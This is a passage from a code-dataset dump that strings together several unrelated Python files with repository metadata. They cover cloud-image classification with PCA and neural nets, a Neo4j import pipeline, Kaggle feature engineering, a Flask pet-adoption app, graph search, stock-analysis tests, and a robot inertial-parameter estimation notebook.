trained_theta, X, y\n\n\ndef OneVsAll_testDataset_pca(path_in, trained_theta, variable, sample_size=30, num_labels=13):\n \n files = [os.path.join(path_in, f) for f in os.listdir(path_in) if f.endswith(\".nc\")]\n \n #To check the length of a vector of an image (may change depending on the PCA)\n data_info = 
xr.open_dataset(files[0])[variable].values\n len_data = data_info.shape[-1]\n len_data_daily = data_info.shape[-2]\n \n X = np.zeros((sample_size*len_data_daily, len_data))\n for t in tqdm(range(sample_size*len_data_daily)):\n X[t, :] = xr.open_dataset(files[t//len_data_daily])[variable].values[t%num_labels, t%len_data_daily].flatten()\n \n p = ML.predictOneVsAll(trained_theta[:,1:], X)\n \n for k in range(num_labels):\n success_of_label_k = 0\n for t in range(k, sample_size*len_data_daily, num_labels):\n if p[t] == k:\n success_of_label_k+=1\n success_of_label_k = success_of_label_k / (sample_size*len_data_daily/num_labels)\n print(\"Success of label\", k, \"is : \", success_of_label_k*100, \"%\")\n return p\n\n\ndef OneVsAll_testArray(path_in, trained_theta, variable, sample_size=30, num_labels=13, k_main_components=10, slices=6):\n \n files = [os.path.join(path_in, f) for f in os.listdir(path_in) if f.endswith(\".npy\")]\n size_array_pca = np.load(files[0]).shape[0]*k_main_components\n \n X = np.zeros((sample_size*num_labels, size_array_pca//slices))\n for t in tqdm(range(sample_size*num_labels)):\n array = np.load(files[t//num_labels])\n array[array != (t+1)%num_labels] = 0\n array[array == (t+1)%num_labels] = 1\n array_pca = pca_array(slice_array(array), k_main_components)[0]\n X[t, :] = array_pca.flatten()\n \n p = ML.predictOneVsAll(trained_theta[:,1:], X)\n \n for k in range(num_labels):\n success_of_label_k = 0\n for t in range(k, sample_size*num_labels, num_labels):\n if p[t] == k%num_labels:\n success_of_label_k+=1\n success_of_label_k = success_of_label_k / sample_size\n print(\"Success of label\", k, \"is : \", success_of_label_k*100, \"%\")\n return p\n\n\ndef plot_OneVsAll_testDataset(path_in, trained_theta, p, sample_size=30, subplot_size=3, num_labels=13):\n \n files = [os.path.join(path_in, f) for f in os.listdir(path_in) if f.endswith(\".nc\")]\n \n len_subplot = subplot_size**2\n \n fig, ax = plt.subplots(subplot_size, subplot_size)\n fig.subplots_adjust(hspace=0.5)\n for t in tqdm(range(len_subplot)):\n array = xr.open_dataset(files[t//num_labels])['data'].values[t//num_labels, t%num_labels, :, :]\n \n try:\n plt.subplot(subplot_size, subplot_size, t+1)\n plt.imshow(array)\n plt.title(f\"Real label is : {t%num_labels} \\n Predicted label is : {p[t]}\")\n except:\n break\n \n plt.savefig(abs_path+f\"/OneVsAll_2017_k10.png\")\n\n return None\n\n# %% 1VSALL ARRAYS K=10\npath_in_arrays_pca = abs_path+\"/TheCloudDataset_labelized_arrays_train_pca_k10\"\n#If dataset is PCA, data variable is '__xarray_dataarray_variable__', 'data' otherwise\nvariable = \"__xarray_dataarray_variable__\"\n\ntrained_theta_arrays, X_arrays, y_arrays = OneVsAll_dataset(path_in_arrays_pca, variable, sample_size=324,\n lambda_=1, num_labels=13, itterations=30)\n\nnp.save(abs_path+\"/trained_theta_k20_itt30_sample324.npy\", trained_theta_arrays)\n\n\n# %% 1VSALL ARRAYS K=20\npath_in_arrays_pca = abs_path+\"/TheCloudDataset_labelized_arrays_train_pca_k10\"\n#If dataset is PCA, data variable is '__xarray_dataarray_variable__', 'data' otherwise\nvariable = \"__xarray_dataarray_variable__\"\n\ntrained_theta_arrays, X_arrays, y_arrays = OneVsAll_dataset(path_in_arrays_pca, variable, sample_size=324,\n lambda_=1, num_labels=13, itterations=30)\n\np_arrays = OneVsAll_testDataset_pca(path_in_arrays_pca, trained_theta_arrays, variable,\n sample_size=1, num_labels=13)\n\nplot_OneVsAll_testDataset(path_in_arrays_pca, trained_theta_arrays, p_arrays, variable, \n sample_size=30, subplot_size= 6, 
num_labels=13)\n\n# %%\n\"\"\"\nNew choices had to be made : even when reducing PCA to 10 main components vectors, the output array\nsize is 728*10=7280 \"pixels\" to study, which way too long for scipy.optimize.minimize.\nEven when sampling ony the first month, the learning matrix was 360*7280.\nThus, we had a new idea : to first reduce the images size before computing both the learning \nalgorithm and the PCA of the data.\nThus, for 10 main components, thetas calculation was ~16min, and 1h10min for k=20.\nIn any way, we still mainly hope for the to-be-done neural network to converge more quickly and be\nable to handle all the data\n\nPS : array slicing gave bad results on the convoluted border dataset. Convolution product should \nbe done over the newly sliced data.\nPS2 : tol in scipy.optimize.minimize was set to 10e-3 instead of the default 10e-8 considering \nthe values of the arrays being aroung 10e1\n\"\"\"\n\n# %%\n#================ 2b - OneVsAll ALGORITHM TESTING ================#\n\n# %% TESTING K=10 2017 (TRAINED)\ntrained_theta_arrays = np.load(abs_path+\"/trained_theta_k10_itt30_sample324.npy\")\npath_in_arrays_pca = abs_path+\"/TheCloudDataset_labelized_arrays_train_pca_k10\"\nvariable = \"__xarray_dataarray_variable__\"\n\np_arrays = OneVsAll_testDataset_pca(path_in_arrays_pca, trained_theta_arrays, variable,\n sample_size=324, num_labels=13)\n\npath_in_arrays = abs_path+\"/TheCloudDataset_labelized_arrays_train\"\n\nplot_OneVsAll_testDataset(path_in_arrays, trained_theta_arrays, p_arrays, \n sample_size=324, subplot_size=4, num_labels=13)\n\n# %% TESTING K=20 2017 (TRAINED)\ntrained_theta_arrays = np.load(abs_path+\"/trained_theta_k20_itt30_sample324.npy\")\npath_in_arrays_pca = abs_path+\"/TheCloudDataset_labelized_arrays_train_pca_k20\"\nvariable = \"__xarray_dataarray_variable__\"\n\np_arrays = OneVsAll_testDataset_pca(path_in_arrays_pca, trained_theta_arrays, variable,\n sample_size=324, num_labels=13)\n\npath_in_arrays = abs_path+\"/TheCloudDataset_labelized_arrays_train\"\n\nplot_OneVsAll_testDataset(path_in_arrays, trained_theta_arrays, p_arrays, \n sample_size=324, subplot_size=4, num_labels=13)\n\n# %% TESTING K=10 2018 (TEST)\ntrained_theta_arrays = np.load(abs_path+\"/trained_theta_k10_itt30_sample324.npy\")\npath_in_arrays_2018 = abs_path+\"/The cloud dataset/2018M10\"\nvariable = \"__xarray_dataarray_variable__\"\n\np_arrays = OneVsAll_testArray(path_in_arrays_2018, trained_theta_arrays, variable,\n sample_size=1000, num_labels=13, k_main_components=10)\n\n# %% TESTING K=20 2018 (TEST)\ntrained_theta_arrays = np.load(abs_path+\"/trained_theta_k20_itt30_sample324.npy\")\npath_in_arrays_2018 = abs_path+\"/The cloud dataset/2018M11\"\nvariable = \"__xarray_dataarray_variable__\"\n\np_arrays = OneVsAll_testArray(path_in_arrays_2018, trained_theta_arrays, variable,\n sample_size=500, num_labels=13, k_main_components=20)\n\n# %%\n\"\"\"\nTesting over the whole 2017 folder :\nWhen testing with k=20 over the learning dataset, results are excellent exepted for 3 categories :\nlabels 2, 3 and 8. This tremendous lack of performance comes from a lack of data, as occurences of \nthose labels are very rare. 
They then should be removed from the learning examples, or be trained on \na dedicated dataset, with more examples (most of the arrays are null)\n\nPS : error calculation is sometimes slightly above 100%, depending on the rounding of the size of the folder\n\nTesting over the whole January 2018 folder :\nWhen testing with k=10 and k=20 over testing dataset, results are overwhelmingly disapointing.\nActually, it recognizes consistantly some labels but doesn't attribute it the right value. \n(eg : label 4 is always recognised as 0)\nThe testing has to be realised over larger sets to confirm the biaises. If confirmed, then the finesse\nof the algorithm should be reduced, to help breaking those biaises.\n\n\nTesting over the whole 2018 folder :\nBiaises seems to be the same. Leet's keep going by woorking on the neural network before coming back\nhere to merge some categories. \n\"\"\"\n\n# %%\n#================ 3 - NEURAL NETWORK ================#\n\n# %%\n\ndef run_datasetNN(path_in, variable=\"__xarray_dataarray_variable__\", sample_size=100, hidden_layer_size=32, num_labels=13, itterations=100):\n \n files = [os.path.join(path_in, f) for f in os.listdir(path_in) if f.endswith(\".nc\")]\n \n #To check the length of a vector of an image (may change depending on the PCA)\n data_info = xr.open_dataset(files[0])[variable].values\n len_data = data_info.shape[-1]\n len_data_daily = data_info.shape[-2]\n \n X, y = data_toarray_selection(path_in, variable, sample_size, num_labels)\n \n Theta1, Theta2 = ML.nnOneLayer(X, y, hidden_layer_size, num_labels, itterations)\n \n return Theta1, Theta2\n\n\ndef test_datasetNN(path_in, Theta1, Theta2, sample_size=100, num_labels=13):\n \n X, y = data_toarray_selection(path_in, variable, sample_size, num_labels)\n p_arrays = ML.predOneLayer(X, Theta1, Theta2)\n \n len_sample, len_data = X.shape\n print(X.shape)\n \n for k in range(num_labels):\n success_of_label_k = 0\n for t in range(k, len_sample, num_labels):\n if p_arrays[t] == k:\n success_of_label_k+=1\n success_of_label_k = trunc(success_of_label_k/(len_sample/num_labels)*10000)\n print(\"Success of label\", k, \"is : \", success_of_label_k/100, \"%\")\n\n return p_arrays\n\n\ndef test_arrayNN(path_in, Theta1, Theta2, k_main_components=10, sample_size=100, num_labels=13):\n \n files = [os.path.join(path_in, f) for f in os.listdir(path_in) if f.endswith(\".npy\")]\n size_array_pca = np.load(files[0]).shape[0]*k_main_components\n \n X = np.zeros((sample_size*num_labels, size_array_pca//6))\n for t in tqdm(range(sample_size*num_labels)):\n array = np.load(files[t//num_labels])\n array[array != (t+1)%num_labels] = 0\n array[array == (t+1)%num_labels] = 1\n array_pca = pca_array(slice_array(array), k_main_components)[0]\n X[t, :] = array_pca.flatten()\n \n p_arrays = ML.predOneLayer(X, Theta1, Theta2)\n\n len_sample, len_data = X.shape\n \n for k in range(num_labels):\n success_of_label_k = 0\n for t in range(k, len_sample, num_labels):\n if p_arrays[t] == k:\n success_of_label_k+=1\n success_of_label_k = trunc(success_of_label_k/(len_sample/num_labels)*10000)\n print(\"\", \"Success of label\", k, \"is : \", success_of_label_k/100, \"%\")\n\n return p_arrays, X\n\n# %%\npath_in_arrays = abs_path+\"/TheCloudDataset_labelized_arrays_train_pca_k10\"\nvariable = \"__xarray_dataarray_variable__\"\n\nTheta1, Theta2 = run_datasetNN(path_in_arrays, variable, sample_size=324, num_labels=13, itterations=100)\n\nnp.save(abs_path+\"/trained_NN_k10_itt100_sample324.npy\", np.array([Theta1, Theta2], dtype=object))\n\n# 
%%\npath_in_arrays = abs_path+\"/TheCloudDataset_labelized_arrays_train_pca_k20\"\nvariable = \"__xarray_dataarray_variable__\"\n\nTheta1, Theta2 = run_datasetNN(path_in_arrays, variable, sample_size=324, num_labels=13, itterations=100)\n\nnp.save(abs_path+\"/trained_NN_k20_itt100_sample324.npy\", np.array([Theta1, Theta2], dtype=object))\n\n# %%\npath_in_arrays = abs_path+\"/TheCloudDataset_labelized_arrays_train_pca_k30\"\nvariable = \"__xarray_dataarray_variable__\"\n\nTheta1, Theta2 = run_datasetNN(path_in_arrays, variable, sample_size=324, num_labels=13, itterations=100)\n\nnp.save(abs_path+\"/trained_NN_k30_itt100_sample324.npy\", np.array([Theta1, Theta2], dtype=object))\n\n# %%\n#================ 3b - NEURAL NETWORK TESTING ================#\n\n# %% TESTING K=10 2017 (TRAINED)\npath_in_arrays = abs_path+\"/TheCloudDataset_labelized_arrays_train_pca_k10\"\nvariable = \"__xarray_dataarray_variable__\"\n\nTheta1, Theta2 = np.load(abs_path+\"/trained_NN_k10_itt100_sample324.npy\", allow_pickle=True)\n\np_arrays = test_datasetNN(path_in_arrays, Theta1, Theta2, sample_size=324, num_labels=13)\n\n# %% TESTING K=20 2017 (TRAINED)\npath_in_arrays = abs_path+\"/TheCloudDataset_labelized_arrays_train_pca_k20\"\nvariable = \"__xarray_dataarray_variable__\"\n\nTheta1, Theta2 = np.load(abs_path+\"/trained_NN_k20_itt100_sample324.npy\", allow_pickle=True)\n\np_arrays = test_datasetNN(path_in_arrays, Theta1, Theta2, sample_size=324, num_labels=13)\n\n# %% TESTING K=30 2017 (TRAINED)\npath_in_arrays = abs_path+\"/TheCloudDataset_labelized_arrays_train_pca_k30\"\nvariable = \"__xarray_dataarray_variable__\"\n\nTheta1, Theta2 = np.load(abs_path+\"/trained_NN_k20_itt100_sample324.npy\", allow_pickle=True)\n\np_arrays = test_datasetNN(path_in_arrays, Theta1, Theta2, sample_size=324, num_labels=13)\n\n# %% TESTING K=10 2018 (TEST)\npath_in_arrays = \"D:/The cloud dataset/2018M01\"\n\nTheta1, Theta2 = np.load(\"D:/Machine Learning/Project/trained_NN_k10_itt100_sample324.npy\", allow_pickle=True)\n\np_arrays, X = test_arrayNN(path_in_arrays, Theta1, Theta2, k_main_components=10, sample_size=1000, num_labels=13)\n\n# %% TESTING K=20 2018 (TEST)\npath_in_arrays = abs_path+\"/The cloud dataset/2018M01\"\n\nTheta1, Theta2 = np.load(abs_path+\"/trained_NN_k20_itt100_sample324.npy\", allow_pickle=True)\n\np_arrays = test_arrayNN(path_in_arrays, Theta1, Theta2, k_main_components=20, sample_size=1000, num_labels=13)\n\n# %%\n#================ 4 - RESULTS ANALYSIS ================#\n\n# %%\n\"\"\"\nThe results are not satisfying enough to keep going. Some labels are (kinda) working whereas others\nare fuly broken (for multiple reasons).\nThe way of improvement are as listed here :\n 1) Increasing the resolution of the PCA is not an option for the 1vsAll algorithm, as the maximum \n computation time has already been reached. 
Altough, larger k main components values can be computed \n for the Neural Network\n 2) Merging some labels can be planned, as clouds of a close categories are mainly flying in a pack\n (cf images 0 and 1), and can add weight to a categorie when compared to an other.\n 3) Using the borders convolution to improve the accuracy, or maybe be the only dataset to learn from.\n\"\"\"\n# %%\n#================ END OF PART II ================#\n\n# %%\n \n\n\n\n\n\n\n","repo_name":"Nayel-Blidi/GitPublic","sub_path":"Machine Learning/Project_Cloud_Dataset/P2_Project_TheCloudDataset_machine_learning.py","file_name":"P2_Project_TheCloudDataset_machine_learning.py","file_ext":"py","file_size_in_byte":23354,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"57"} +{"seq_id":"24511329776","text":"import pandas as pd\nimport sqlite3 as sql\nfrom py2neo import Graph, Node, Relationship\n\nimport config\n\n\nclass NeoPipeline(object):\n\n def __init__(self):\n self.graph_path = config.GRAPH_DB['graph_path']\n self.graph = Graph(self.graph_path)\n self.sql_path = \"data/network.sqlite\"\n\n def nodes_from_sql(self, query, label, unique=\"id\"):\n \"\"\"\n INPUT: str, str, str\n OUTPUT: None\n Imports node data from sql query into neo4j\n \"\"\"\n # Extract data from sql db.\n with sql.connect(self.sql_path) as con:\n nodes = pd.read_sql(sql=query, con=con, index_col=None)\n nodes_dict = nodes.to_dict(outtype=\"records\")\n\n # Create nodes in graph.\n self.graph.schema.create_uniqueness_constraint(label, unique)\n for node in nodes_dict:\n n = Node.cast(label, node)\n self.graph.create(n)\n\n def relationships_from_sql(self, query, nodes, label, properties):\n \"\"\"\n INPUT: str, list(dict), str, dict\n OUTPUT: None\n Imports relationship data from sql query into neo4j\n \"\"\"\n with sql.connect(self.sql_path) as con:\n rels = pd.read_sql(sql=query, con=con, index_col=None)\n rels_dict = rels.to_dict(outtype=\"records\")\n\n for rel in rels_dict:\n r = Relationship.cast(self.graph.find_one(nodes[0][\"label\"], nodes[0][\"property\"], rel[nodes[0][\"sql_col\"]]),\n label,\n self.graph.find_one(nodes[1][\"label\"], nodes[1][\"property\"], rel[nodes[1][\"sql_col\"]]),\n properties)\n self.graph.create(r)\n\n def build_network(self):\n query_players = '''\n SELECT player_name AS name, player_id AS id, player_pos AS pos\n FROM individuals_subset\n GROUP BY player_id\n '''\n self.nodes_from_sql(query_players, \"Players\", unique=\"id\")\n query_coaches = '''\n SELECT coach_name AS name, coach_id AS id\n FROM individuals_subset\n GROUP BY coach_id\n '''\n self.nodes_from_sql(query_coaches, \"Coaches\", unique=\"id\")\n\n query_play_coach = '''\n SELECT *\n FROM individuals_subset\n '''\n play_coach = [{'label': \"Coach\", 'property': \"id\", 'sql_col': \"coach_id\"}, {'label': \"Player\", 'property': \"id\", 'sql_col': \"player_id\"}]\n self.relationships_from_sql(query_play_coach, nodes=play_coach, label_rel=\"COACHED\", properties={\"league\": \"NBA\"})","repo_name":"anthonywyso/network","sub_path":"pipeline_graphdb.py","file_name":"pipeline_graphdb.py","file_ext":"py","file_size_in_byte":2712,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"57"} +{"seq_id":"1634509981","text":"import pandas as pd\n\n# feat_file = \"data/train_feat.csv\"\n# ext_feat_file = \"data/train_ext_feat.csv\"\ndog_breeds_file = \"data/dog_breeds_ext.csv\"\n\n# load dog breed data from American Kennel Club and create dummy variables\ndog_breeds_df = 
pd.read_csv(dog_breeds_file)\ndog_groups_df = pd.get_dummies(dog_breeds_df['Dog_group'])\ndog_breeds_df = pd.concat([dog_breeds_df.drop('Dog_group', axis=1), dog_groups_df], axis=1)\n\nfor subset in ['train', 'test']:\n feat_file = \"data/\" + subset + \"_feat.csv\"\n ext_feat_file = \"data/\" + subset + \"_ext_feat.csv\"\n # load data\n feat_df = pd.read_csv(feat_file, parse_dates=['DateTime'], infer_datetime_format=True)\n\n # join on Breed, cat breeds will have missing values which will be dropped after\n # file is loaded\n feat_ext_df = pd.merge(left=feat_df, right=dog_breeds_df, how='left', on='Breed')\n feat_ext_df.to_csv(ext_feat_file, index=False)\n","repo_name":"vzaretsk/kaggle-animal-shelter","sub_path":"external_features.py","file_name":"external_features.py","file_ext":"py","file_size_in_byte":904,"program_lang":"python","lang":"en","doc_type":"code","stars":4,"dataset":"github-code","pt":"57"} +{"seq_id":"2928475242","text":"'''Pet adoption agency app'''\n\nfrom flask import Flask, render_template, redirect, url_for, request, flash\nfrom models import db, connect_db, Pet\nfrom forms import AddPetForm, EditPetForm\n\napp = Flask(__name__)\napp.config['SQLALCHEMY_DATABASE_URI'] = 'postgresql:///pet_adopt_db'\napp.config['SQLALCHEMY_TRACK_MODIFICATIONS'] = False\napp.config['SQLALCHEMY_ECHO'] = True\n\nconnect_db(app)\n\nfrom flask_debugtoolbar import DebugToolbarExtension\napp.config['SECRET_KEY'] = \"SECRET!\"\ndebug = DebugToolbarExtension(app)\n\n\n@app.errorhandler(404)\ndef page_not_found(e):\n '''Show 404 page.'''\n return render_template('404.html'), 404\n\n@app.route('/')\ndef pet_list():\n '''Show list of pets available for adoption'''\n pets = Pet.query.all()\n\n return render_template('pet_list.html', pets=pets)\n\n@app.route('/add', methods=['POST', 'GET'])\ndef pet_add():\n '''Add a pet.'''\n form = AddPetForm()\n\n if form.validate_on_submit():\n name = form.name.data\n species = form.species.data\n photo_url = form.photo_url.data\n age = form.age.data\n notes = form.notes.data\n\n new_pet = Pet(name=name, species=species, photo_url=photo_url, age=age, notes=notes)\n db.session.add(new_pet)\n db.session.commit()\n\n flash(f'Added {name} the {species}!')\n\n return redirect(url_for('pet_list'))\n\n else:\n return render_template('pet_add_form.html', form=form)\n\n@app.route('/', methods=['POST', 'GET'])\ndef pet_detail(pet_id):\n '''Show pet info with form to edit pet.'''\n\n pet = Pet.query.get_or_404(pet_id)\n form = EditPetForm(obj=pet)\n\n if form.validate_on_submit():\n # pet.photo_url = form.photo_url.data\n # pet.notes = form.notes.data\n # pet.available = form.available.data\n form.populate_obj(pet)\n\n db.session.commit()\n\n return redirect(url_for('pet_list'))\n\n else:\n return render_template('pet_detail.html', pet=pet, form=form)\n\n\n","repo_name":"hall-ash/SB_Exercises","sub_path":"flask/adopt/app.py","file_name":"app.py","file_ext":"py","file_size_in_byte":1975,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"57"} +{"seq_id":"71278046559","text":"from functools import partial\n\nfrom Graph import Graph\nfrom Vertex import Vertex\nfrom search import breadth_first_search, depth_first_search, a_star_search, heuristic, cost\n\n\nif __name__ == \"__main__\":\n a = Vertex('a')\n b = Vertex('b')\n c = Vertex('ç')\n d = Vertex('d')\n e = Vertex('e')\n\n g = Graph()\n g.addVertex(a)\n g.addVertex(b)\n g.addVertex(c)\n g.addVertex(d)\n g.addVertex(e)\n g.addDirectedEdge(a, c)\n g.addDirectedEdge(a, d)\n 
g.addDirectedEdge(a, b)\n g.addDirectedEdge(c, d)\n g.addDirectedEdge(b, d)\n g.addDirectedEdge(d, e)\n g.addDirectedEdge(b, e)\n\n path_d = depth_first_search(g.vertices[-1], g)\n print(list(map(lambda n: n.value, path_d)))\n path_b = breadth_first_search(g.vertices[-1], g)\n print(list(map(lambda n: n.value, path_b)))\n# path_vals = list(map(lambda n: n.value, path))\n# print(path_vals)\n\n# h = heuristic(\"Mombasa\")\n# nr_dists = cost(\"Nairobi\")\n\n\n# nrb_dists = cost(\"Nairobi\")\n# print(nrb_dists(\"Kisumu\"))\n# print(nrb_dists(\"Kisumu\"))\n\n # levels = BFS(g.vertices[0], g)\n # for i in range(len(levels)):\n # print(\"Level\", i, \":\")\n # for j in levels[i]:\n # print(\"\\t\", j)\n","repo_name":"JerryNyoike/GraphSearchAlgos","sub_path":"main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":1146,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"51"} +{"seq_id":"32205442583","text":"import unittest\nfrom io import StringIO\nfrom unittest.mock import Mock, patch\n\nfrom analysis_printer import AnalysisPrinter\nfrom symbol_data import SymbolData\n\nSYMBOL = \"FOO\"\nOVERVIEW = {\"MarketCapitalization\": 30000000001}\nBALANCE_SHEET = {\n \"quarterlyReports\": [{\"totalCurrentAssets\": 2000, \"totalCurrentLiabilities\": 1000}]\n}\nEARNINGS = {\n \"annualEarnings\": [{\"reportedEPS\": 1.33}] * 3 + [{\"reportedEPS\": 1.0}] * 7,\n \"quarterlyEarnings\": [{\"reportedEPS\": 1.0}] * 12,\n}\nQUOTE = {\n \"Global Quote\": {\"05. price\": \"60.00\"},\n}\nFOO_SYMBOL_DATA = SymbolData(\n SYMBOL,\n OVERVIEW,\n BALANCE_SHEET,\n EARNINGS,\n QUOTE,\n time_series_monthly_adjusted=None,\n)\n\n\nclass TestAnalyze(unittest.TestCase):\n @patch(\"sys.stdout\", new_callable=StringIO)\n def test_print_buy_recommendation(self, mock_stdout):\n printer = AnalysisPrinter(FOO_SYMBOL_DATA)\n printer.recommender.recommendation = Mock(return_value=True)\n expected_message = \"\"\"====== RECOMMENDATION ======\nThe recommendation for FOO is True\n\"\"\"\n printer.print_recommendation()\n self.assertEqual(expected_message, mock_stdout.getvalue())\n\n @patch(\"sys.stdout\", new_callable=StringIO)\n def test_print_sell_recommendation(self, mock_stdout):\n printer = AnalysisPrinter(FOO_SYMBOL_DATA)\n printer.recommender.recommendation = Mock(return_value=False)\n expected_message = \"\"\"====== RECOMMENDATION ======\nThe recommendation for FOO is False\n\"\"\"\n printer.print_recommendation()\n self.assertEqual(expected_message, mock_stdout.getvalue())\n\n @patch(\"sys.stdout\", new_callable=StringIO)\n def test_print_sell_recommendation(self, mock_stdout):\n printer = AnalysisPrinter(FOO_SYMBOL_DATA)\n printer.recommender.recommendation = Mock(return_value=False)\n expected_message = \"\"\"====== RECOMMENDATION ======\nThe recommendation for FOO is False\n\"\"\"\n printer.print_recommendation()\n self.assertEqual(expected_message, mock_stdout.getvalue())\n","repo_name":"devskii/stocks-python","sub_path":"analysis_printer_test.py","file_name":"analysis_printer_test.py","file_ext":"py","file_size_in_byte":2016,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"51"} +{"seq_id":"30550635241","text":"#!/usr/bin/env python\r\n# coding: utf-8\r\n\r\n# # Analyzing inertial parameter estimation in simulation\r\n# ## Read Text file and make variables\r\n\r\n# In[36]:\r\n\r\n\r\n#!/usr/bin/env python3\r\n\r\n# read text files\r\n\r\nimport matplotlib.pyplot as plt\r\nimport numpy as np\r\nimport sys\r\nfrom scipy import signal, 
fftpack\r\nfrom scipy.signal import savgol_filter\r\nget_ipython().run_line_magic('matplotlib', 'inline')\r\nlogging_freq = 800\r\n# enter data file here\r\n\r\ndata_file = \"data_file_04-14-19_02-16-16\"\r\n# info about data_file_03-14-19_12-55-13\r\n# RLS controller drawing circles\r\n# correct estimation m,com, wrong inertia\r\n# gravity included\r\n\r\n# info about data_file_03-14-19_15-17-59\r\n# Trajectory testing with sin yaxis\r\n# gravity included\r\n# wrong estimation m,com,inertia T\r\n\r\n# info about data_file_03-14-19_15-21-49\r\n# RLS controller with sin yaxis\r\n# gravity removed\r\n# right estimation m, wrong com,inertia\r\n\r\n# info about data_file_03-14-19_16-12-11\r\n# RLS controller with sin yaxis + move up and down\r\n# gravity removed\r\n# right estimation m,com wrong inertia\r\n\r\n# info about data_file_03-14-19_20-57-06\r\n# estimation controller with sin yaxis + move up and down\r\n# gravity removed\r\n# right estimation m,com wrong inertia\r\n\r\n\r\npath = \"/Users/elenakern/university/masters/sai-2/apps/inertial_parameter_application/data_collection/simulation/inertial_params_est/\"\r\n\r\n# path = \"/home/elenakern/Codes/sai2.0/applications/data_collection/simulation/inertial_params_est/\"\r\npath_data_file = path + data_file\r\n\r\nfile = np.loadtxt(path_data_file,skiprows=1)\r\n\r\npos = file[0::,0:3] #position (end-effector in last link frame)\r\nvel = file[0::,3:6] #linear velocity (end-effector in last link frame)\r\naccel = file[0::,6:9] #linear acceleration (end-effector in last link frame)\r\navel = file[0::,9:12] #angular velocity (end-effector in last link frame)\r\naaccel = file[0::,12:15] #angular acceleration (end-effector in last link frame)\r\nforce_virtual = file[0::,15:18] #virtual force simulation\r\ntorque_virtual = file[0::,18:21] #virtual torque simulation\r\nphi_RLS = file[0::,21:31] #inertial parameters RLS\r\ngravity = file [0::, 31:34]\r\naccel_sim = file[0::, 34:37]\r\navel_sim = file [0::, 37:40]\r\naaccel_sim = file [0::, 40:43]\r\ngravity_ = file [0::, 43:46]\r\n\r\n\r\n# phi_LS = file[0::,35:45] #inertial parameters LS\r\n# phi_debug = file[0::,45:55] #inertial parameters direct functs\r\n\r\n\r\n#files until data_file_03-14-19_20-57-06\r\n# accel = file[0::,0:3] #linear acceleration (end-effector in last link frame)\r\n# avel = file[0::,3:6] #angular velocity (end-effector in last link frame)\r\n# aaccel = file[0::,6:9] #angular acceleration (end-effector in last link frame)\r\n# g_local = file[0::,9:12] #gravity vector (end-effector in last link frame)\r\n# force_virtual = file[0::,12:15] #virtual force simulation\r\n# torque_virtual = file[0::,15:18] #virtual torque simulation\r\n# phi = file[0::,18:28] #inertial parameters\r\n# mass = file[0::,18:19] #estimated mass\r\n# center_of_mass = file[0::,19:22] #estimated center of mass\r\n# inertial_tensor = file[0::,22:28] #estimated inertia tensor\r\n\r\ntime = np.arange(np.size(accel[:,0]))\r\ntime = time/800\r\n\r\n\r\n\r\n\r\nphi_aux = phi_RLS\r\nphi_aux[:,1] /= phi_aux[:,0]\r\nphi_aux[:,2] /= phi_aux[:,0]\r\nphi_aux[:,3] /= phi_aux[:,0]\r\n\r\nprint(np.shape(phi_RLS[:,0]))\r\nprint(np.size(phi_RLS[:,0]))\r\n\r\naux = np.ones(np.shape(phi_RLS[:,0]))\r\nmse_1 = np.empty_like(phi_RLS)\r\nmse_2 = np.empty_like(phi_RLS)\r\nmse_1[:,0] = (np.square(phi_RLS[:,0] - 2.0*aux)).mean(axis=0)\r\nprint(mse_1[:,0])\r\nmse_1[0,0] = (np.square(phi_RLS[0,0] - 2.0)).mean(axis=None)\r\nprint(mse_1[:,0])\r\nprint(np.square(phi_RLS[0,0]-2.0).mean())\r\n\r\nreal_values = np.array([2.0,0.02, 0.03, 
0.2, 0.5, 0.0,0.0,0.5,0.0,0.5])\r\nfor idx,value in enumerate(real_values): #for all 10 inertial params \r\n for i in np.arange(np.size(phi_RLS[:,0])): #elementwise \r\n mse_2[i,idx] = (np.square(phi_RLS[i,idx] - value)).mean(axis=None) #mean squared error\r\nprint(mse_2[:,0])\r\n\r\nprint(phi_RLS[:,0])\r\n\r\n\r\n# In[37]:\r\n\r\n\r\nderivatives = np.zeros(file.shape)\r\nderivatives[1:,:]=file[1:]-file[:-1]\r\nderivatives[0]=derivatives[1]\r\n\r\n\r\n# In[35]:\r\n\r\n\r\npos_dot = derivatives[0::,0:3]*logging_freq #position (end-effector in last link frame)\r\nvel_dot = derivatives[0::,3:6]*logging_freq #linear velocity (end-effector in last link frame)\r\naccel_dot = derivatives[0::,6:9]*logging_freq #linear acceleration (end-effector in last link frame)\r\navel_dot = derivatives[0::,9:12]*logging_freq #angular velocity (end-effector in last link frame)\r\naaccel_dot = derivatives[0::,12:15]*logging_freq \r\n\r\naccel_sim_dot= derivatives[0::, 34:37]*logging_freq \r\navel_sim_dot = derivatives [0::, 37:40]*logging_freq \r\naaccel_sim_dot = derivatives [0::, 40:43]*logging_freq \r\n\r\n\r\n# ## Plotting functions\r\n# ### TUM colors\r\n\r\n# In[3]:\r\n\r\n\r\n#TUM colors rgb\r\nblue = (0,0.3961,0.7412)\r\nred = (0.7686,0.0275,0.1059)\r\ngreen =(0,0.4863,0.1882)\r\norange = (0.8902, 0.4471, 0.1333)\r\npurple = (0.4118, 0.0314, 0.3529)\r\ngrey = (0.6118, 0.6157, 0.6235)\r\nyellow = (0.9765, 0.7294, 0)\r\ncolor_list = [blue, red, green, orange, grey, purple, yellow]\r\n\r\n\r\n# ### Function definitions\r\n\r\n# In[4]:\r\n\r\n\r\ndef Plot_three_dim(time, data, ylabel, title, subtitle):\r\n f, axarr = plt.subplots(3,1,figsize=(7,9))\r\n f.suptitle(title, fontsize=20)\r\n coordinates = [\"$_x$\",\"$_y$\",\"$_z$\"]\r\n for idx,coordinate in enumerate(coordinates):\r\n axarr[idx].plot(time, data[:,idx], c=blue)\r\n axarr[idx].set_title(subtitle+str(coordinate))\r\n axarr[idx].set_xlim([0, time[-1]])\r\n axarr[idx].set_ylabel(ylabel)\r\n axarr[2].set_xlabel(\"Elapsed time in $s$\")\r\n plt.setp([a.get_xticklabels() for a in f.axes[:-1]], visible=False)\r\n plt.tight_layout()\r\n plt.subplots_adjust(top=0.9)\r\n \r\ndef 